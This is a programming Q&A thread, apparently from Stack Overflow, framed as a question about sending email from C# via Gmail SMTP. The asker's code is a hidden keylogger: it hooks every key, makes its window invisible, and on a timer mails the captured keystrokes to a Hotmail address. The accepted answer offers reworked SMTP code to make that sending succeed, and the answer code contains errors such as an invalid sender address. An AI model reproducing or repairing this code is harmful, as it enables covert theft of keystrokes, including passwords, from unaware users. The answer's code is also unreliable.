# smtp email through C#

Tags: c#, email, smtp, smtpclient

I cannot send an email to myself through smtp and trough Gmail and Hotmail. 
Do you have any ideas how it can be solved or where the error is?

```
  public partial class Form1 : Form
{
    public Form1()
    {
        InitializeComponent();
    }

    string log;
    string klokkeslæt;
    globalKeyboardHook gkh = new globalKeyboardHook();

    private void HookAll() //funktionen Hookall oprettes
    {
        foreach (object key in Enum.GetValues(typeof(Keys)))
        {
            gkh.HookedKeys.Add((Keys)key);
        }
    }

    private void Form1_Load(object sender, EventArgs e)
    {
        gkh.KeyDown += new KeyEventHandler(gkh_KeyDown);
        HookAll();
        this.Opacity = 0;
    } 

    void gkh_KeyDown(object sender, KeyEventArgs e)
    {
        log = log + " " + e.KeyCode;
    }

    private void timer1_Tick(object sender, EventArgs e)
    {
        MailMessage mail = new MailMessage("eksamensprojekt2014.gmail.com", "gymjoy@hotmail.com");
        SmtpClient SmtpServer = new SmtpClient("smtp.gmail.com", 587);
        mail.From = new MailAddress("eksamensprojekt2014@gmail.com");
        mail.To.Add("gymjoy@hotmail.com");
        klokkeslæt = DateTime.Now.ToString("HH:mm:ss:tt");
        mail.Subject = klokkeslæt;
        mail.Body = log;
       // SmtpServer.Port = 587;
        SmtpServer.Credentials = new System.Net.NetworkCredential("eksamensprojekt2014@gmail.com", "*********");
        SmtpServer.EnableSsl = true;
        SmtpServer.Send(mail);
        mail.Priority = MailPriority.Normal;
        SmtpServer.useDefaultCredentials = true; 
    }

}
```

Comment: Start reading a book. Once you are finished with a C# book you will know what exceptions are and then you may actually realize telling us WHAT fails is a little smarter than dumping your code on us and making us doing your work.

Comment: Hint: Your mail looks like spam. If you get no error Gmail may just have decided you are a spammer. In this case the error is not "email is not sent" but "I am writing spam".

Comment: You ask for error fixing, but which error do you get?

Answer (score 3, accepted):

Try with below code it working fine.

```
        MailMessage message = new MailMessage();//Not set from and to address here.
        SmtpClient smtpClient = new SmtpClient();//Not set Host name here.
        string msg = string.Empty;
        try
        {
            MailAddress fromAddress = new MailAddress("eksamensprojekt2014.gmail.com");
            message.From = fromAddress;
            message.To.Add("gymjoy@hotmail.com");
            message.Subject = "Test";
            message.IsBodyHtml = true;
            message.Body = "Test";
            smtpClient.Host = "smtp.gmail.com";   // We use gmail as our smtp client
            smtpClient.Port = 587;
            smtpClient.EnableSsl = true;
            smtpClient.UseDefaultCredentials = true;
            smtpClient.Credentials = new System.Net.NetworkCredential("eksamensprojekt2014.gmail.com", "*******");

            smtpClient.Send(message);
            msg = "Successful<BR>";
        }
        catch (Exception ex)
        {
            msg = ex.Message;
        }
```

Comment: It is always helpful when you point out what was wrong with the original code.

Comment: Yes I have Set comment as "Not set from and to address here". In the original code set from and to address in while create instance of Mail Message class.Like below code..                                                          MailMessage("eksamensprojekt2014.gmail.com", "gymjoy@hotmail.com");